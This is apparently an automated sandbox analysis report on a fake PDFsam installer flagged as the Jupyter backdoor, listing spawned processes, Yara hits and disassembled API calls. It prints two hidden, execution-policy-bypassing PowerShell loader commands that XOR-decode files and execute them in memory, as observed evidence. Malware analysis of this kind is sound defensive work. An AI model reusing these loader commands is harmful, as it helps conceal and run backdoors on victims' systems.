                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1
                                                                                                    Imagebase:0x7ff777c90000
                                                                                                    File size:66048 bytes
                                                                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:28:15
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe'
                                                                                                    Imagebase:0xfb0000
                                                                                                    File size:16852824 bytes
                                                                                                    MD5 hash:801B1B11E979AF812CA4387E5F438AD8
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 6%, Metadefender
                                                                                                    • Detection: 20%, ReversingLabs
                                                                                                    Reputation:low

                                                                                                    General

                                                                                                    Start time:21:28:18
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                                                                                                    Imagebase:0x7ff7bedd0000
                                                                                                    File size:447488 bytes
                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.740405887.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.749058298.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.739854732.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.746350232.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.749409808.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.750055391.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.742546203.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:28:18
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff724c50000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:28:24
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll'
                                                                                                    Imagebase:0xf80000
                                                                                                    File size:20992 bytes
                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:28:26
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServer
                                                                                                    Imagebase:0x3a0000
                                                                                                    File size:16852824 bytes
                                                                                                    MD5 hash:801B1B11E979AF812CA4387E5F438AD8
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 6%, Metadefender
                                                                                                    • Detection: 20%, ReversingLabs
                                                                                                    Reputation:low

                                                                                                    General

                                                                                                    Start time:21:29:03
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()'
                                                                                                    Imagebase:0x7ff7bedd0000
                                                                                                    File size:447488 bytes
                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Source: 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Jupyter, Description: Yara detected Jupyter backdoor, Source: 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                    Reputation:high

                                                                                                    General

                                                                                                    Start time:21:29:04
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff724c50000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language

                                                                                                    Disassembly

                                                                                                    Code Analysis

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:5.4%
                                                                                                      Total number of Nodes:184
                                                                                                      Total number of Limit Nodes:13

                                                                                                      Graph

_ValidateLocalCookies 5 API calls 2464->2466 2466->2465 2230 10af7d0 2231 10af7ea 2230->2231 2232 10af7f2 2230->2232 2233 10af802 2231->2233 2237 1869f8d 2231->2237 2235 1869f8d KiUserExceptionDispatcher 2233->2235 2236 10af847 2235->2236 2238 1869fa7 2237->2238 2239 1869fd4 KiUserExceptionDispatcher 2237->2239 2238->2239 2239->2233

                                                                                                      Executed Functions

                                                                                                      APIs
                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01A2DE04), ref: 0189941A
                                                                                                      • _free.LIBCMT ref: 01899408
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      • _free.LIBCMT ref: 018995D4
                                                                                                      Strings
                                                                                                      • W. Europe Standard Time, xrefs: 01899489
                                                                                                      • W. Europe Daylight Time, xrefs: 018994B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                      • API String ID: 2155170405-986674615
                                                                                                      • Opcode ID: 9c87f68a377757f966f7946c9ef48c7120683b87119ad54f95072d344421731b
                                                                                                      • Instruction ID: f58d447c13dce5f12e4f15882c24dd46db4b5566d3cbb49a599122414ad7ecf3
                                                                                                      • Opcode Fuzzy Hash: 9c87f68a377757f966f7946c9ef48c7120683b87119ad54f95072d344421731b
                                                                                                      • Instruction Fuzzy Hash: 34510671D0020AABDF21EF6DDC819AE7BBCAF51324B1801AEE551E7591E7309B41CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • W. Europe Standard Time, xrefs: 01899489
                                                                                                      • W. Europe Daylight Time, xrefs: 018994B8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                      • API String ID: 597776487-986674615
                                                                                                      • Opcode ID: a506fc88ec80485f4a30903325746d2d495efb881fd2b170da8762b11ec6d987
                                                                                                      • Instruction ID: 1cc98f62d3b9367e73485dbfbfe1f234143797c37f539db47ae8bc056371fe18
                                                                                                      • Opcode Fuzzy Hash: a506fc88ec80485f4a30903325746d2d495efb881fd2b170da8762b11ec6d987
                                                                                                      • Instruction Fuzzy Hash: 5DC14971D0420A9BDF269F7CDC806AA7BBDAF56328F1C509EE495D7282E7308B41C791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 0189957E
                                                                                                      • _free.LIBCMT ref: 018995D4
                                                                                                        • Part of subcall function 018993B0: _free.LIBCMT ref: 01899408
                                                                                                        • Part of subcall function 018993B0: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01A2DE04), ref: 0189941A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                      • String ID:
                                                                                                      • API String ID: 597776487-0
                                                                                                      • Opcode ID: 4788085f9b4f6d05814f74d6332b8ae5c55c4b8ef4e5129b3540ca9e66085e9f
                                                                                                      • Instruction ID: e941ba9fcfdfc3ff833d8407bf6369d3f2b0a6c6b7c4f60e14e4dc38588b8e47
                                                                                                      • Opcode Fuzzy Hash: 4788085f9b4f6d05814f74d6332b8ae5c55c4b8ef4e5129b3540ca9e66085e9f
                                                                                                      • Instruction Fuzzy Hash: 72210EB1C0021A5BDF31A62D9C44AEB77BC9F91378F18029AF895E3180DB705F858A91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CloseHandle.KERNEL32(?,?,?,0187BACF,?,?,0187B941,00000000), ref: 0187B9C9
                                                                                                      • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0187BACF,?,?,0187B941,00000000), ref: 0187B9DF
                                                                                                      • ExitThread.KERNEL32 ref: 0187B9E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitThread$CloseFreeHandleLibrary
                                                                                                      • String ID:
                                                                                                      • API String ID: 2705336791-0
                                                                                                      • Opcode ID: bf4c853077cb99e858229dc6f308c4e059c192233c0710d51fb18a5ea4896fd2
                                                                                                      • Instruction ID: b6f8632919df19c0f3a508358a45f65b3738a8a5f3764b7dafc52af793173019
                                                                                                      • Opcode Fuzzy Hash: bf4c853077cb99e858229dc6f308c4e059c192233c0710d51fb18a5ea4896fd2
                                                                                                      • Instruction Fuzzy Hash: FCF08C314007007BEB315E7DCA4DB6A7EAAAF02320B184610FA75C70A0FB30DA51C791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 274 1869f8d-1869fa5 275 1869fa7-1869faa 274->275 276 1869fd4-1869ff6 KiUserExceptionDispatcher 274->276 277 1869fac-1869fc8 275->277 278 1869fca-1869fcd 275->278 277->276 277->278 278->276 279 1869fcf 278->279 279->276
                                                                                                      APIs
                                                                                                      • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,010AF847,00000000,00000014,?,010AF847,?,01B23E54,?,?,00000004,00000000,00000000,59481BE9), ref: 01869FED
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID: ios_base::failbit set
                                                                                                      • API String ID: 6842923-3924258884
                                                                                                      • Opcode ID: 9526f7e08bd6c16c2342ef8eef238265d413a435df4458f16e453eb9943a038c
                                                                                                      • Instruction ID: d4a3a2da2e1bf479796c59ad225918a908c86af113ba7fb791cf212342d16526
                                                                                                      • Opcode Fuzzy Hash: 9526f7e08bd6c16c2342ef8eef238265d413a435df4458f16e453eb9943a038c
                                                                                                      • Instruction Fuzzy Hash: 2E018F35900209AFD7019F5CD584BAEBFBDFF44714F154159EA44AB391DB70AA01CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(01B21CB0,0000000C), ref: 0187B8F6
                                                                                                      • ExitThread.KERNEL32 ref: 0187B8FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611280651-0
                                                                                                      • Opcode ID: cfb469f85adee780257d11a2bdc1af184178e7d59d7d9ea9a3fd7537bd611b40
                                                                                                      • Instruction ID: 7baf03718356f1a4304e7d4cde4db34221ee71e357f76d730881650efb37ae2c
                                                                                                      • Opcode Fuzzy Hash: cfb469f85adee780257d11a2bdc1af184178e7d59d7d9ea9a3fd7537bd611b40
                                                                                                      • Instruction Fuzzy Hash: 96F0FF30A002029FDF11BBB4C54CB2EBBB6EF24300F144449E001D7240DB309A02CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 301 1895999-18959a5 302 18959d7-18959e2 call 1879a33 301->302 303 18959a7-18959a9 301->303 310 18959e4-18959e6 302->310 305 18959ab-18959ac 303->305 306 18959c2-18959d3 RtlAllocateHeap 303->306 305->306 307 18959ae-18959b5 call 1892960 306->307 308 18959d5 306->308 307->302 313 18959b7-18959c0 call 1883a74 307->313 308->310 313->302 313->306
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,01899274,00000002,?,01A2DE04), ref: 018959CB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: e089c1b218514375beba02fd759c4ed208e241e8776f1781624b7fceeb3afc51
                                                                                                      • Instruction ID: 9e02e60eb561235f9ff89c5470e2655542878c8de6c8686afb8cafcff011e72b
                                                                                                      • Opcode Fuzzy Hash: e089c1b218514375beba02fd759c4ed208e241e8776f1781624b7fceeb3afc51
                                                                                                      • Instruction Fuzzy Hash: 29E0653160561656FF23276DAC00B6A7A4C9F437B0F1D0123EE88E6585DB50CB0086F2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 316 187b174-187b187 call 189595f 318 187b18c-187b18e 316->318
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 0187B187
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1353095263-0
                                                                                                      • Opcode ID: 9e3b06649ea68a8a46df76b7f407484dbdbcea1553bfb3040db3a828de9b73d4
                                                                                                      • Instruction ID: dfc2c38f2cad52283034067d665b23ba9c6d6d2e7d310f4fcca8c2e9fa65fcd8
                                                                                                      • Opcode Fuzzy Hash: 9e3b06649ea68a8a46df76b7f407484dbdbcea1553bfb3040db3a828de9b73d4
                                                                                                      • Instruction Fuzzy Hash: C3C08C71000208BBDF019B45D806A4E7BA8DB81374F200044E80557250CAB1EF009680
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 85906d68f9382c766aa00e403d72d3473e1ae2011df671951f505d34db857443
                                                                                                      • Instruction ID: 62dafbf560af7260db5f183ad087c4fe4018b9be673809200b7ebdf3e667754d
                                                                                                      • Opcode Fuzzy Hash: 85906d68f9382c766aa00e403d72d3473e1ae2011df671951f505d34db857443
                                                                                                      • Instruction Fuzzy Hash: BBF06532615224DFCF2ADB8CC545B5973ACEB45B55F655096E601DB151C370DF01C7D0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0189EA4F
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD0F
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD21
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD33
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD45
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD57
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD69
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD7B
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD8D
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD9F
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DDB1
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DDC3
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DDD5
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DDE7
                                                                                                      • _free.LIBCMT ref: 0189EA44
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      • _free.LIBCMT ref: 0189EA66
                                                                                                      • _free.LIBCMT ref: 0189EA7B
                                                                                                      • _free.LIBCMT ref: 0189EA86
                                                                                                      • _free.LIBCMT ref: 0189EAA8
                                                                                                      • _free.LIBCMT ref: 0189EABB
                                                                                                      • _free.LIBCMT ref: 0189EAC9
                                                                                                      • _free.LIBCMT ref: 0189EAD4
                                                                                                      • _free.LIBCMT ref: 0189EB0C
                                                                                                      • _free.LIBCMT ref: 0189EB13
                                                                                                      • _free.LIBCMT ref: 0189EB30
                                                                                                      • _free.LIBCMT ref: 0189EB48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      • Opcode ID: a94daa16c7603f93bb276a1c49c0f23fa5ce3ec24c2322bb28136957819803d1
                                                                                                      • Instruction ID: 0a60e3c798fa0ae493c5cac48e4f5031df0833bfcef95076372b207029291c4d
                                                                                                      • Opcode Fuzzy Hash: a94daa16c7603f93bb276a1c49c0f23fa5ce3ec24c2322bb28136957819803d1
                                                                                                      • Instruction Fuzzy Hash: DC316F716003029FFF32EA7CE844B567BE9BF12320F18441AE55AD7161DF74AA518B21
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01868AA7
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 01868AAF
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01868B38
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 01868B63
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01868BB8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: 63c1630240dff6a6ed3c9a1063e551ac11793facce07836283cce3633efdd1ac
                                                                                                      • Instruction ID: 9bb84ce898a7881e2198839caac4a6e29f98d99cb20af782f43026e0532ebab5
                                                                                                      • Opcode Fuzzy Hash: 63c1630240dff6a6ed3c9a1063e551ac11793facce07836283cce3633efdd1ac
                                                                                                      • Instruction Fuzzy Hash: 35611A74A003199BDF11DF3CC8416AABBE9AF16318F188165ED08EB385E735DB41CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 0189E41F: _free.LIBCMT ref: 0189E444
                                                                                                      • _free.LIBCMT ref: 0189E721
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      • _free.LIBCMT ref: 0189E72C
                                                                                                      • _free.LIBCMT ref: 0189E737
                                                                                                      • _free.LIBCMT ref: 0189E78B
                                                                                                      • _free.LIBCMT ref: 0189E796
                                                                                                      • _free.LIBCMT ref: 0189E7A1
                                                                                                      • _free.LIBCMT ref: 0189E7AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 3ff960c9f426b0b1d9642582b90f182e092f541f6df77c86b992ec3ac8139a4a
                                                                                                      • Instruction ID: ff67d04da439a315d581f8eaf380b862578e8213a970620e06e8fc83a012dd83
                                                                                                      • Opcode Fuzzy Hash: 3ff960c9f426b0b1d9642582b90f182e092f541f6df77c86b992ec3ac8139a4a
                                                                                                      • Instruction Fuzzy Hash: 72118471640B06B7EF21F774CC45FCB7B9C7F22710F484835A79AE6051E624B7164652
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 0189E1BF
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      • _free.LIBCMT ref: 0189E1D1
                                                                                                      • _free.LIBCMT ref: 0189E1E3
                                                                                                      • _free.LIBCMT ref: 0189E1F5
                                                                                                      • _free.LIBCMT ref: 0189E207
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 4f31a499a085ef956d6f32915919a380097df7c1e43ea5cce802fbb05e3fb6e7
                                                                                                      • Instruction ID: a6acdcc484b8222b33233bfb4e02145f30fe3a70156d1d540dc27877c088b0ed
